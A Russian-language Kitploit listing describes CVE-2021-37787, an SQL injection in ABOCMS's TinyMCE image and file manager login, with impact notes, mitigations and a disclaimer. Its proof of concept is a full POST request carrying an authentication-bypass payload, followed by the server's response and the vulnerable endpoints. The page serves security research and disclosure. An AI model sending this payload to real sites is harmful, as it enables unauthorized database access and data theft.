Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-37787 — CVE-2021-37787 | Kitploit
Инструменты/GitHubGitHub/vasykor/cve-2021-37787
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и Образование
GitHubvasykor/cve-2021-37787

CVE-2021-37787

CVE-2021-37787

Репозиторий
121 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-37787: SQL-инъекция в ABOCMS через модуль TinyMCE

Детали уязвимости

  • ID CVE: CVE-2021-37787
  • Продукт: ABOCMS
  • Затронутые версии: 5.8.x, ≤5.9.3
  • Тип уязвимости: SQL-инъекция
  • Оценка CVSS: 9.8

Описание

Критическая уязвимость SQL-инъекции существует в ABOCMS в модуле TinyMCE. Уязвимость возникает из-за недостаточной очистки входных данных во взаимодействии модуля TinyMCE с базой данных, что позволяет атакующему внедрять вредоносные SQL-запросы. Это может привести к несанкционированному доступу к данным, их модификации или даже полной компрометации базовой базы данных.

Уязвимая конечная точка находится в обработке введенных пользователем данных в модуле TinyMCE. Атакующий может использовать этот недостаток для выполнения произвольных SQL-команд.

Воздействие

  • Обход аутентификации.
  • Извлечение конфиденциальных данных.
  • Изменение или удаление записей базы данных.
  • Потенциальное удаленное выполнение кода в зависимости от конфигурации базы данных.

Доказательство концепции (PoC)

POST-запрос

root@kitploit:~
POST /js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php HTTP/1.1
Host: <yourdomain.name>
Content-Type: application/x-www-form-urlencoded

return_url=%2Fjs%2Fadmin%2Ftiny_mce%2Fplugins%2Fimagemanager%2Findex.php%3Ftype%3Dim%26page%3Dindex.html&login=1%27+OR+%271%27%3D1+%23&password=1&submit_button=Login

Ответ

root@kitploit:~
HTTP/1.1 302 Found
Server: nginx-reuseport/1.21.1
Date: <date>
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
Keep-Alive: timeout=30
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
A-Powered-By: ABO.CMS 5.9.3 (fe01ce2a7fbac8fafaed7c982a04e229)
location: /js/admin/tiny_mce/plugins/imagemanager/index.php?type=im&page=index.html

Уязвимая конечная точка

Уязвимость можно активировать через следующую конечную точку:

/js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php /js/admin/tiny_mce/plugins/filemanager/login_session_auth.php

Смягчение

  • Для пользователей:

    • Обновите до последней версии ABOCMS.
    • Отключите модуль TinyMCE, если он не обязателен.
  • Для разработчиков:

    • Используйте подготовленные выражения или параметризованные запросы для взаимодействия с базой данных.
    • Обновите модуль TinyMCE до последней защищенной версии.
    • Реализуйте правильную проверку входных данных для фильтрации вредоносных нагрузок.

Отказ от ответственности

Это PoC предоставлено только для образовательных целей и исследований в области безопасности. Не используйте этот код для нанесения вреда системам или сетям без явного разрешения владельца. Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этим PoC.

Скачать инструмент